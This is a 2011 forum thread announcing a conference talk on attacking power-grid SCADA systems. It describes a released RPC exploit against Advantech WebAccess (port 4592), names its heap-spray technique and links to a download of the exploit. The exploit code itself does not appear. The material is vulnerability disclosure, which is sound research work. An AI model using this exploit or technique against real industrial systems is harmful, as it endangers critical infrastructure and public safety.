Teddy Rogers Posted March 28, 2011 Share Posted March 28, 2011 You can download the slides of the research I was presenting at RootedCon'11 in Madrid "SCADA Trojans: Attacking the grid". A journey into attacking the power grid. I presented:- 0days in Advantech/BroadWin WebAccess SCADA product- Weak Design/Vulnerabilities in CSE-Semaphore TBOX RTUs- General attack against EMS Software via State Estimators.I contacted ICS-CERT to coordinate with Advantech but the vendor denied having a security flaw. So guys, the exploit I'm releasing does not exist. All is product of your mind. Well, indeed WebAccess is full of bugs. It is an RPC exploit against WebAccess Network Service, port 4592. It leaks the security code that protects the scada node in addition to demonstrate RCE on XP. Slighly modifications can be done to support other systems. I use "RPC heap spray", I mean any opcode with the following params "[in] long arg_x, [in][ref][size_is(arg_x)] char * arg_x " can be used to create a fake object to control the execution. It could be done in other ways, but this one is funny. Check the slides, there is more info about the vulns there./>http://www.reversemode.com/downloads/exploit_advantech.zip/>http://www.reversemode.com/downloads/Scada_Trojans_Ruben_Rootedcon.pdfTed. Link to comment Share on other sites More sharing options...
ghandi Posted May 23, 2011 Share Posted May 23, 2011 We're closer than ever before, but we're still light years away from hacking the gas mains so they will explode and provide cover for an operation we're conducting... (Seen SwordFish anybody? Them d00dz has got skillz0rs) On a serious note, thanks for the share Teddy, interesting as always. HR, Ghandi Link to comment Share on other sites More sharing options...
Teddy Rogers Posted May 24, 2011 Author Share Posted May 24, 2011 Actually I'm a bit more in to PLC's and industrial technology, I've got quite a few PLC's at home I work with. Its quite surprising how some (very large) companies are open to exploits and security related issues so we can expect more to happen in this area...Ted. Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now